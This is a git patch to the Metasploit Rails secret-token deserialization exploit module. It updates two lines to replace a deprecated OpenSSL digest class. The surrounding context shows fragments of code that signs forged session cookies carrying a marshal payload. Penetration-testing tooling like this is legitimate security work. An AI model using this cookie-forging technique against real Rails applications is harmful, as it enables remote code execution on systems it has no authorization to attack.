From e79ccb08cb4e2f1c655fb2cbb73fcd6e3aa41b92 Mon Sep 17 00:00:00 2001
From: Niel Nielsen <nieldk@gmail.com>
Date: Tue, 7 Jan 2014 21:41:15 +0100
Subject: [PATCH] Update rails_secret_deserialization.rb

When using aws-sdk with Ruby 2.1.0-rc1, many "Digest::Digest is deprecated; use Digest" warnings are printed.
Even in Ruby 1.8.7-p374, OpenSSL::Digest::Digest is only provided for backward compatibility.
---
 modules/exploits/multi/http/rails_secret_deserialization.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 5fa74b9488..46751d2f1f 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
       keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000})
       sigkey = keygen.generate_key(datastore['SALTSIG'])
     end
-    digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
+    digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
   end
 
   def rails_4
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def rails_3
     # Sign it with the secret_token
     data = build_cookie
-    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), datastore['SECRET'], data)
+    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), datastore['SECRET'], data)
     marshal_payload = Rex::Text.uri_encode(data)
     "#{marshal_payload}--#{digest}"
   end